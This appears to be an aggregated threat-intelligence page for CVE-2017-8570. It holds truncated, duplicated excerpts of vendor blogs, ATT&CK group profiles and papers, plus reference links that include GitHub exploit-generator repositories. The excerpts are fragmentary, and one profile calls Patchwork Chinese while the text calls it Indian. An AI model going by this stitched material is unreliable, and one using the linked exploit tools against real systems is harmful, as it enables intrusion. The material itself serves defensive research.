CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
- Q2 figures
- Mobile threats
- Attacks on IoT devices
- Online threats in the financial sector
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q2 figures
According to KSN:
- Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
- 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
- Ransomware attacks were registered on the computers of 158,921 unique users.
- Our File Anti-Virus logged 192,053,
Securelist
IT threat evolution Q2 2018. Statistics
blogs_securelist·2018-08-06
IT threat evolution Q2 2018. Statistics
Table of Contents
Q2 figures
Mobile threats
General statistics
Distribution of detected mobile apps by type
TOP 20 mobile malware
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Attacks on IoT devices
Telnet attacks
TOP 10 countries by shares of IoT devices infected via Telnet
TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks
SSH attacks
TOP 10 countries by shares of IoT devices attacked via SSH
Online threats in the financial sector
Q2 events
New banking Trojan DanaBot
The peculiar BackSwap technique
Carbanak gang leader detained
Ransomware Trojan uses Doppelgänging technique
General statistics on financial threats
Geography of attacks
TOP 10 countries by percentage of attacked users
TOP 10 banking malware f
Volexity
Patchwork APT Group Targets US Think Tanks
blogs_volexity·2018-06-07·CVSS 7.8
[HIGH] Patchwork APT Group Targets US Think Tanks
Threat Intelligence
## Patchwork APT Group Targets US Think Tanks
June 7, 2018
Matthew Meltzer, Sean Koessel, and Steven Adair
In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 3 60 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia . From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are le
Volexity
Patchwork APT Group Targets US Think Tanks
blogs_volexity·2018-06-07·CVSS 7.8
[HIGH] Patchwork APT Group Targets US Think Tanks
Threat Intelligence
# Patchwork APT Group Targets US Think Tanks
June 7, 2018
Matthew Meltzer, Sean Koessel, and Steven Adair
In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are lever
Trendmicro
Confucius Update: New Techniques, More Patchwork Links
blogs_trendmicro·2018-05-23
Confucius Update: New Techniques, More Patchwork Links
APT & Targeted Attacks
# Confucius Update: New Techniques, More Patchwork Links
We look into the latest tools and techniques used by Confucius, as the threat actor seems to have a new modus operandi, setting up two new websites and new payloads with which to compromise its targets.
By: Daniel Lunghi, Jaromir Horejsi
2018/05/23
Read time: ( words)
Save to Folio
Updated the appendix on August 30, 2018 to fix formatting and add new information.
Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia. During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
Q1 figures
Mobile threats
Q1 events
Mobile threat statistics
Distribution of detected mobile apps by type
TOP 20 mobile malware
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Vulnerable apps used by cybercriminals
Malicious programs online (attacks via web resources)
Online threats in the financial sector
Q1 events
Financial threat statistics
Geography of attacks
TOP 10 banking malware families
Cryptoware programs
Q1 events
Number of new modifications
Number of users attacked by Trojan cryptors
Geography of attacks
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Alexander Li
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
- Vladislav Stolyarov
- Boris Larin
- Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
### Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After
Securelist
The King is dead. Long live the King!
blogs_securelist·2018-05-09·CVSS 7.5
CVE-2018-8174 [HIGH] The King is dead. Long live the King!
Authors
Vladislav Stolyarov
Boris Larin
Anton Ivanov
## Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.
## Searching for the zero day
Our story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.
After the
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Untangling the Patchwork Cyberespionage Group
blogs_trendmicro·2017-12-11
Untangling the Patchwork Cyberespionage Group
Cyber Crime
# Untangling the Patchwork Cyberespionage Group
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets.
By: Daniel Lunghi, Jaromir Horejsi, Cedric Pernet
2017/12/11
Read time: ( words)
Save to Folio
Updated as of October 9, 2018, 7:24PM PDT to remove Socksbot and update the appendix and technical brief; hat tip to Michael Yip of Accenture Security for an earlier research on Socksbot.
Patchwork (also known as Dropping Elephant) is a cyberespionage group known for targeting diplomatic and government agencies that has since added businesses to their list of targets. Patchwork’s moniker is from its notoriety for rehashing off-the-rack tools and malwa
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
Q3 figures
Mobile threats
Q3 events
The spread of the Asacub banker
New capabilities of mobile banking Trojans
The growth of WAP billing subscriptions
Mobile threat statistics
Distribution of mobile malware by type
TOP 20 mobile malware programs
The geography of mobile threats
Mobile banking Trojans
Mobile ransomware
Vulnerable apps exploited by cybercriminals
Online threats (Web-based attacks)
Online threats in the banking sector
Geography of attacks
TOP 10 banking malware families
Cryptoware programs
Q3 highlights
Crysis rises from the dead
Surge in Cryrar attacks
Master key to original versions of Petya/Mischa/GoldenEye published
The number of new modifications
The number of users attacked by ransomware
The geography of attacks
Top 10 countrie
Securelist
IT threat evolution Q3 2017. Statistics
blogs_securelist·2017-11-10
IT threat evolution Q3 2017. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Vulnerable apps exploited by cybercriminals
- Online threats (Web-based attacks)
- Local threats
Authors
- Roman Unuchek
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
## Q3 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.
72,012,219 unique URLs were recognized as malicious by web antivirus components.
Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.
Crypto ransomware attacks were blocked on 186283 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially
Trendmicro
CVE-2017-0199: New Malware Abuses PowerPoint Slides
blogs_trendmicro·2017-08-14·CVSS 7.8
CVE-2017-0199 [HIGH] CVE-2017-0199: New Malware Abuses PowerPoint Slides
Exploits & Vulnerabilities
# CVE-2017-0199: New Malware Abuses PowerPoint Slides
We recently observed a new malwae type exploiting CVE-2017-0199 using a new method that abuses PowerPoint Slide Show—the first time we have seen this approach used in the wild.
By: Ronnie Giagone, Rubio Wu
2017/08/14
Read time: ( words)
Save to Folio
CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents, a method used by the DRIDEX banking trojan discovered earlier this year.
We recently observed a new sample (Detected by Trend Micro as TROJ_CVE2017019
Talos
Microsoft Patch Tuesday - July 2017
blogs_talos·2017-07-11·CVSS 7.8
CVE-2017-8463 [HIGH] Microsoft Patch Tuesday - July 2017
Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, Internet Explorer, Office, and Windows.
### Vulnerabilities Rated Critical
#### CVE-2017-8463
This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited this vulnerability could run arbitrary code, users not running as administrators would be less affected. This vulnerability can be triggered via a malicious share folder and malware named with an executable extension.
#### CVE-2017-8584 A remote code execution vul
Threat Intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
threat_intel
Cobalt Group (Cobalt Group, GOLD KINGSWOOD, Cobalt Gang)
# Threat Actor Profile: Cobalt Group
ATT&CK ID: G0080
Also known as: Cobalt Group, GOLD KINGSWOOD, Cobalt Gang, Cobalt Spider
## Overview
Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
blogs_recorded_future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018 | Recorded Future
## Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
Click here to download the complete analysis as a PDF.
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report , and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
## Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to she
Recorded Future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
blogs_recorded_future
Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
# Microsoft Targeted by 8 of 10 Top Vulnerabilities in 2018
Click here to download the complete analysis as a PDF.
This analysis focuses on an exploit kit, phishing attack, or remote access trojan co-occurrence with a vulnerability from January 1, 2018 to December 31, 2018. We analyzed thousands of sources, including code repositories, deep web forum postings, and dark web sites. This is a follow-up to our 2017 report, and the intended audience includes information security practitioners, especially those supporting vulnerability risk assessments.
### Executive Summary
Many vulnerability management practitioners face the daunting task of prioritizing vulnerabilities without adequate insight into which vulnerabilities are actively exploited by cybercriminals. Here, we’ll attempt to shed
Threat Intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
threat_intel
Patchwork (Patchwork, Hangover Group, Dropping Elephant)
# Threat Actor Profile: Patchwork
ATT&CK ID: G0040
Also known as: Patchwork, Hangover Group, Dropping Elephant, Chinastrats, MONSOON, Operation Hangover
Suspected origin: China
## Overview
Patchwork is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Patchwork has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Cita
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
An Analysis of Malware Trends in Enterprise Networks
arxiv_fulltext·2019-10-01
An Analysis of Malware Trends in Enterprise Networks
An Analysis of Malware Trends in Enterprise Networks
An Analysis of Malware Trends in Enterprise Networks
Abbas Acar1,
Long Lu 2,
A. Selcuk Uluagac 1,
Engin Kirda 2
A. Acar et al.
Florida International University
\aacar001,suluagac\@fiu.edu
Northeastern University
[email protected],[email protected]
## Abstract
We present an empirical and large-scale analysis of malware
samples captured from two different enterprises from 2017 to early 2018. Particularly, we perform threat vector, social-engineering, vulnerability and
time-series analysis on our dataset. Unlike existing malware studies, our
analysis is specifically focused on the recent enterprise malware samples. First
of all, based on our analysis on the combined datasets of two enterprises, our
results confirm the general consensu
http://www.securityfocus.com/bid/99445https://github.com/ParsingTeam/ppsx-file-generatorhttps://github.com/rxwx/CVE-2017-8570https://github.com/tezukanice/Office8570https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8570http://www.securityfocus.com/bid/99445https://github.com/ParsingTeam/ppsx-file-generatorhttps://github.com/rxwx/CVE-2017-8570https://github.com/tezukanice/Office8570https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8570https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-8570
2017-07-11
Published
2022-02-25
Added to CISA KEV
Exploited in the wild